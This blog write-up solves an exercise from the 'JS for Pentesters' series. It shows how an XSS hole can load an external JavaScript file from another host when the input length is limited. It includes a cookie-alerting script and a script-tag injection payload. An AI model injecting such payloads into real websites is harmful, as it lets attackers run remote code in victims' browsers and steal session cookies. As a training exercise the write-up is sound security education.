XSS - including external js file: JS for Pentesters task 9 write up

Oct 29, 2014 • jsp, javascript, xss, security-tube

writeup for task-9 of the series JS for pentesters by security-tube - Including external JS

This challenge is a bit different from the ones that we did till now. Consider a case where you found out an XSS vulnerability but you can enter only limited number of characters through the XSS parameter but you need to do a lot more than that. What will you do ? A possible way is to add the script inside a file and try to inject that file via the xss. Let us see this with an example:

JS for Pentesters task 9

Our objective is to Include an external JS file into this page and Code inside that JS should pop the cookie inside an alert box.

So the first task is to write a .js  file and host it somewhere so that it can alert the cookie. The code for the same is:

    alert(document.cookie);

Please note that when you are writing JavaScript inside a file, it shouldn’t be enclosed inside a <script> tag. So consider we created a file cookie.js which contains the code to alert the cookie. Now we should host the script somewhere so that it can be accessed via public URL. So I uploaded the script to my blog and tried to inject it to the challenge. The payload looks like this:

    <script src="http://security.securethelock.com/wp-content/uploads/2014/11/cookie.js"></script>

So as you can see, this challenge is fairly easy but it has I hope you learned a good lesson. What we did is very simple. First upload the JavaScript file to a site and get its absolute location. Then you can inject the file via XSS  by using src attribute, inside a <script> tag.

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.

We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE